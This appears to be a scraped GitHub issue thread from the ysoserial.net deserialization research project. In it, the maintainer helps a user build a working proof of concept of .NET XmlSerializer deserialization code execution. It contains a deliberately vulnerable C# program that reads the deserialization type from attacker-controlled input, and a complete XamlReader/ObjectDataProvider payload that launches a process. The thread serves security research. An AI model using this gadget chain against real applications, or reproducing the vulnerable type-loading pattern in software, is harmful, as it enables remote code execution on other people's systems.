Comments (9)
adon90
commented on July 30, 2024
2
Muchas gracias Alvaro por ese codigo de verdad que me ha costado bastante encontrar una PoC así y que funcione bien sin necesitar 1000 clases y mierdas asi que te lo agradezco, el codigo definitivo con los imports y un pequeño fallo que tenia al cargar el XML es este:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Serialization;
namespace XMLDoc
{
class Program
{
static void Main(string[] args)
{
var xmlDoc = new XmlDocument();
xmlDoc.Load(@"d:\miau.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root"))
{
string typeName = xmlItem.GetAttribute("type");
Console.WriteLine(typeName);
var xser = new XmlSerializer(Type.GetType(typeName));
var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
xser.Deserialize(reader);
}
}
}
}
;)!
from ysoserial.net.
pwntester
commented on July 30, 2024
Hi,
For XmlSerializer to be vulnerable, attacker needs to be able to control expected type:
XmlSerializer xmlSerializer = new XmlSerializer(<attacker controllable>, "http://web.com/a");
Cheers,
A
from ysoserial.net.
adon90
commented on July 30, 2024
Hey, I am doing tests with Visual Studio and I haven't managed to create a vulnerable XmlSerializer code from scratch, please, send me a simple vulnerable project or point me in the right direction, the one I am using is this one:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Xml.Serialization;
namespace WindowsFormsApplication3
{
[XmlRoot]
public class TestClass
{
public string classname;
private string name;
private int age;
[XmlAttribute]
public string Classname { get { return classname; } set { classname = value; } }
[XmlElement]
public string Name { get { return name; } set { name = value; } }
[XmlElement]
public int Age { get { return age; } set { age = value; } }
public override string ToString()
{
return base.ToString();
}
}
class Program
{
static void Main(string[] args)
{
TestClass testClass = new TestClass();
using (var stream = new FileStream(@"d:\1.xml", FileMode.Open))
{
var serializers = new XmlSerializer(typeof(TestClass));
testClass = serializers.Deserialize(stream) as TestClass;
}
MessageBox.Show(testClass.Name);
}
}
}
But I think that class doesn't meet the conditions, I would appreciate some help, thanks
from ysoserial.net.
adon90
commented on July 30, 2024
This is the payload I am using:
<?xml version="1.0" encoding="utf-8"?>
<ExpandedWrapperOfTestClassObjetDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ProjectedProperty0>
<ObjectInstance xsi:type="TestClass">
<Age>0</Age>
<MethodName><ClassMethod</MethodName>
<MethodParameters>
<anyType xsi:type="xsd:string">calc.exe</anyType>
</MethodParameters>
<ProjectedProperty0>
</ExpandedWrapperOfTestClassObjetDataProvider>
from ysoserial.net.
pwntester
commented on July 30, 2024
Check slide 47 here: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
Attacker needs to be able to control expected type as DNN was doing here:
https://github.com/dnnsoftware/Dnn.Platform/blob/a142594a0c18a589cb5fb913a022eebe34549a8f/DNN%20Platform/Library/Common/Utilities/XmlUtils.cs#L201
from ysoserial.net.
adon90
commented on July 30, 2024
Hello Alvaro, thank you very much, but, if that's not too much to ask for, could you please provide me a complete code I can just use straightforward not parts of code? Thanks
from ysoserial.net.
adon90
commented on July 30, 2024
This is my code now, if you tell me how to set the "miau.xml" payload up based on the code to test a command execution, would be epic. Thanks!!!
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Xml;
using System.Xml.Serialization;
namespace WindowsFormsApplication3
{
class Program
{
static void Main(string[] args)
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml("miau.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/item")) {
string typeName = xmlItem.GetAttribute("type");
var xser = new XmlSerializer(Type.GetType(typeName));
}
}
}
}
from ysoserial.net.
pwntester
commented on July 30, 2024
Just make the argument to XmlSerializer to take a type derived from a string controlled by the attacker. Check the new RCE found on Sharepoint for another example:
from ysoserial.net.
pwntester
commented on July 30, 2024
Havent tried it but should be something like:
namespace WindowsFormsApplication3
{
class Program
{
static void Main(string[] args)
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml("miau.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root")) {
string typeName = xmlItem.GetAttribute("type");
var xser = new XmlSerializer(Type.GetType(typeName));
var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
xser.Deserialize(reader);
}
}
}
}
And then miau.xml should be the one you generated:
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider>
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd</System:String>
<System:String>/c calc</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
from ysoserial.net.
Related Issues (20)
- Differences in output from plugin DotNetNuke using release 1.32 vs 1.34. HOT 2
- Any gadget for .NET Core HOT 3
- Detection without out-of-band interaction HOT 1
- Constantly encountering FormatException: Invalid length for a Base-64 char array or string. HOT 1
- the exe file considered having a virus HOT 1
- Unable to cast object of type 'System.Windows.Data.ObjectDataProvider' to type 'System.Windows.Media.Brush' HOT 2
- 033102051731: The given key was not present in the dictionary HOT 1
- cannot be exploited when in compatibility mode....... compatibilityMode="Framework45" HOT 1
- Update Outdated Dependencies HOT 2
- The problem of deserializing AES\3DES in Viewstate HOT 3
- Handling gadgets that don't result in command execution
- Requires AES/3DES support
- fix artifact and document how to compile HOT 5
- add TypeNameHandling.Auto
- Default output format - Release 1.35
- The XamlAssemblyLoadFromFileGenerator gadget is not a gadget
- Bug Report: Regex in DataContractSerializer_Marshal_2_MainType Function HOT 3
- How to Generate Encrypted ViewState without MAC Validation HOT 1
- Include Compilation Instructions HOT 1
- [feature request] Add run any byte code/dll in deserialization chain HOT 3
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ysoserial.net.